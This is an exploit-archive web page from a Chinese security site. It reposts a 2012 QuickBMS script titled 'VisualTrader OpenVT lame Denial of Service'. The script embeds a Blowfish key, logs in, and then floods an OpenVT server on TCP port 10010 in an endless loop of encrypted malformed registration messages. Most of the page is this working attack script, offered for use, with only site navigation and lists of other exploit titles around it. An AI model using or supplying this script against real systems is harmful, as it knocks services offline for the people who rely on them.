首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
VisualTrader OpenVT lame Denial of Service
来源:aluigi.org 作者:Luigi 发布时间:2012-07-02  
# VisualTrader OpenVT lame Denial of Service
# quickbms -n openvt_dos.bms "tcp://SERVER:10010" .
# script for Quickbms http://quickbms.aluigi.org

get SERVER fullname
set KEY string "3jds894jsnwmtod0295jdhbtr5bv789dsjkerk59fjq2k39fklwo04dm"

set MEMORY_FILE binary "10|full_program_name|username|password|"
callfunction OPENVT_SEND

# Denial of Service
for
    set MEMORY_FILE binary "1|1|1|program_exe|description|version|1"
    callfunction OPENVT_SEND
next

for
    callfunction OPENVT_RECV
next

startfunction OPENVT_SEND
    get SIZE asize MEMORY_FILE
    #goto 0 MEMORY_FILE
    #getdstring DATA SIZE MEMORY_FILE
    #print "SEND: %DATA%"
    math SIZE x= 8
    putvarchr MEMORY_FILE SIZE 0

    encryption bf_cbc KEY "" 1
    log MEMORY_FILE 0 SIZE MEMORY_FILE
    encryption "" ""

    string TMP p= "#%07x" SIZE
    putdstring TMP 8
    log SERVER 0 SIZE MEMORY_FILE
    put 0x0d byte
    put 0x0a byte
endfunction

startfunction OPENVT_RECV
    getdstring SIZE 8
    putvarchr SIZE 0 0x24
    getdstring DATA SIZE
    getdstring TMP 2
    encryption bf_cbc KEY ""
    string DATA E= DATA
    encryption "" ""
    strlen SIZE DATA
    print "RECV: %DATA%"
endfunction

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Serv-U FTP <= 11.1.0.3 possibl
·Quest NetVault SmartDisk <= 1.
·Novell GroupWise Messenger <=
·GenBroker <= 9.21.201.01 multi
·xArrow <= 3.2 multiple vulnera
·GenBroker <= 9.21.201.01 multi
·Chrome Engine 4 Denial of Serv
·vBulletin 4.0.0 Beta 5 Remote
·python-wrapper untrusted searc
·HP Data Protector Create New F
·Zoom Player 4.51 Standard - ".
·Emesene 2.12.5 Password Disclo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved